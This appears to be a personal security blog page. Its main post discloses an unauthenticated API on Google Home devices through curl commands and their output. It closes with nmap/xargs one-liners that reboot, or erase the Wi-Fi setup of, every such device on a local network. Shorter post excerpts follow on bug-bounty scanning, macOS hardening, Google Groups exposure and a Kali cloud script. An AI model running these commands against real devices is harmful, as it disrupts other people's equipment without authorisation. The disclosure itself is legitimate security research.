Blog Posts

Google Home (in)Security

TL;DR: An undocumented API in Google home devices is easily exploitable.  

This command will reboot any on your local network:
nmap --open -p 8008 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://%:8008/setup/reboot


I have always been a fan of Google Products, so when they announced the Google Home Hub, I ordered one.

Once I got the Hub on my network I scanned it and it returned the following:

Nmap scan report for hub
Host is up (0.046s latency).
Not shown: 995 closed ports
8008/tcp open http
8009/tcp open ajp13
8443/tcp open https-alt
9000/tcp open cslistener
10001/tcp open scp-config

I was surprised to see so many ports open so I started to do some research and found that these devicies have an undocumented (and amazingly unsecured) API

After spending 15 or 20 minutes looking I found that you can reboot the hub with this unauthenticated curl command:  

curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot

I tweeted what happens when you run that command:

After I was able to get the Hub to reboot I was hooked and gave up a few hours of sleep to do some research and ended up finding a bunch of “good” information (see reading list at bottom). 

At the end of the night, I was extremely disappointed with the security of these devices especially coming from Google who I trust with so much of my data and is the driving force behind BeyondCorp

Technical Deep Dive

I am going to dive directly into sharing some of the commands I have found and the output and will end by showing how a bad actor could use this API. 

System Information

Pull Basic SSDP Information:

$ curl http://hub:8008/ssdp/device-desc.xml
<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
    <friendlyName>Kitchen Display</friendlyName>
    <manufacturer>Google Inc.</manufacturer>
    <modelName>Google Home Hub</modelName>

Pull The Eureka Infomation:

$ curl -s http://hub:8008/setup/eureka_info | jq
  "bssid": "cc:be:59:8c:11:8b",
  "build_version": "136769",
  "cast_build_revision": "1.35.136769",
  "closed_caption": {},
  "connected": true,
  "ethernet_connected": false,
  "has_update": false,
  "hotspot_bssid": "FA:8F:CA:9C:AA:11",
  "ip_address": "",
  "locale": "en-US",
  "location": {
    "country_code": "US",
    "latitude": 255,
    "longitude": 255
  "mac_address": "11:A1:1A:11:AA:11",
  "name": "Hub Display",
  "noise_level": -94,
  "opencast_pin_code": "1111",
  "opt_in": {
    "crash": true,
    "opencast": true,
    "stats": true
  "public_key": "Removed",
  "release_track": "stable-channel",
  "setup_state": 60,
  "setup_stats": {
    "historically_succeeded": true,
    "num_check_connectivity": 0,
    "num_connect_wifi": 0,
    "num_connected_wifi_not_saved": 0,
    "num_initial_eureka_info": 0,
    "num_obtain_ip": 0
  "signal_level": -60,
  "ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
  "ssid": "SSID",
  "time_format": 2,
  "timezone": "America/Chicago",
  "tos_accepted": true,
  "uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
  "uptime": 25244.52,
  "version": 9,
  "wpa_configured": true,
  "wpa_id": 0,
  "wpa_state": 10

Run A Simple Speedtest:

$ curl -Lv -H Content-Type:application/json --data-raw '{ "url": "" }' http://hub:8008/setup/test_internet_download_speed


Reboot The System:

$ curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot
*   Trying hub...
* Connected to hub (hub) port 8008 (#0)
> POST /setup/reboot HTTP/1.1
> Host: hub:8008
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Type:application/json
> Content-Length: 16
* upload completely sent off: 16 out of 16 bytes
< HTTP/1.1 200 OK
< Access-Control-Allow-Headers:Content-Type
< Cache-Control:no-cache
< Content-Length:0
* Connection #0 to host hub left intact


List Currently Configured Network:

$ curl http://hub:8008/setup/configured_networks

Delete The Current Configured Network:

curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://hub:8008/setup/forget_wifi
*   Trying hub...
* Connected to hub (hub) port 8008 (#0)
> POST /setup/forget_wifi HTTP/1.1
> Host: hub:8008
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Type:application/json
> Content-Length: 15
* upload completely sent off: 15 out of 15 bytes

This command basically makes the device unusable until you manually reconfigure it using the Google Home application:

Scan For Wireless Networks:

$ curl -X POST http://hub:8008/setup/scan_wifi

List Scan Results:

$ curl | jq

    "ap_list": [
        "bssid": "11:11:11:11:11:11",
        "frequency": 2462,
        "signal_level": -72
    "bssid": "11:11:11:11:11:11",
    "signal_level": -72,
    "ssid": "SSID",
    "wpa_auth": 7,
    "wpa_cipher": 4
    "ap_list": [
        "bssid": "11:11:11:11:11:11",
        "frequency": 2412,
        "signal_level": -81
    "bssid": "11:11:11:11:11:11",
    "signal_level": -81,
    "ssid": "SSID2",
    "wpa_auth": 7,
    "wpa_cipher": 4
    "ap_list": [
        "bssid": "11:11:11:11:11:11",
        "frequency": 2462,
        "signal_level": -77
    "bssid": "11:11:11:11:11:11",
    "signal_level": -77,
    "ssid": "You_Get_The_Idea",
    "wpa_auth": 7,
    "wpa_cipher": 4

Other Commands:

List Alarms and Timers:

$ curl http://hub:8008/setup/assistant/alarms

Disable All Notifcations:

$ curl -Lv -H Content-Type:application/json --data-raw '{ "notifications_enabled": true }' http://hub:8008/setup/assistant/notifications

Malicious Scripting 

Since none of these endpoints require authentication being malicious on a network with these present is trivial.  

This code will reboot all Google Home devices on the network:

nmap --open -p 8008 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://%:8008/setup/reboot

This code will delete the wireless network from every Google Home on the network causing a manual reconfgiruation

nmap --open -p 8008 | awk '/is up/ {print up}; {gsub (/(|)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifi

Closing Thoughts

I am genuinely shocked by how poor the overall security of these devices are, even more so when you see that these endpoints have been known for years and relatively well documented. 

I usually would have worked directly with Google to report these issues if they had not previously been disclosed, but due to the sheer amount of prior work online and committed code in their own codebase, it is obvious they know.

Reading List:

Bulk Bug Bounty Scanning With The Burp 2.0 API

The new rest API in Burp 2.0 it is going to be amazing but it will allow things like this 9 line shell script I wrote this morning that will grab all public bounty sites from  @arkadiyt’s  bounty-targets-data repo and kick off a full scan.

I almost didn’t post this blog because I *think* this script is, in general, a bad idea and will likely lead to frivolous bounty reports and excessive traffic to these sites but if there is going to be an API people will abuse use it. 

MacOS Security Baseline Script

I spend a lot of time working with MacOS and I have noticed that out of the box the operating system has some basic security settings that are not enabled by default so I have built a small script that automates configuring these.

It does the following:

MacOS-Security-Baseline is on GitHub here.  If you have any improvements or suggestions, please submit a GitHub issue or pull request.

I have also built three other tools in the past that compliments this tool:

MacOS-Config configures a new install of MacOS the way I like it.

MacOS-Maid cleans up MacOS by deleting unneeded files, wireless SSID’s and wiping free space.

Blackhat-MacOS-Config does most of what this script does and was the base for it but I wanted to present it to a more general audience.

Leaking Sensitive Data Through Google Groups

Recently I have noticed that companies that use Google Suite have a fairly common misconfiguration that is making their internal groups public.  In some cases it is just the name of the groups but in some extreme cases the content of the posts are public.

Testing for this misconfiguration on your domain is as easy as looking at:!forumsearch/

Google has (not really clear) instructions here on how to lock down your groups so they are not public. I have notified as many of the domains that I can that they have a misconfiguration but I am not able to notify everyone and Google has seemed to file this under It's not a bug, it's a feature.

60 Second Kali Box

I am a fan of Kali Linux and AWS so I love the fact that they have an official AMI.  While spinning up a Kali instance in AWS is fairly easy, I had a long flight today so I wrote a script that will spin up a Kali instance in about 60 seconds.

The script does the following:

  • Builds a security group that only allows SSH access from your current public IP.
  • Writes a new SSH Key in ~/Documents/instantkali/
  • Creates a t2.medium EC2 instance.

Here is the output: 


Here is the code:

Site Footer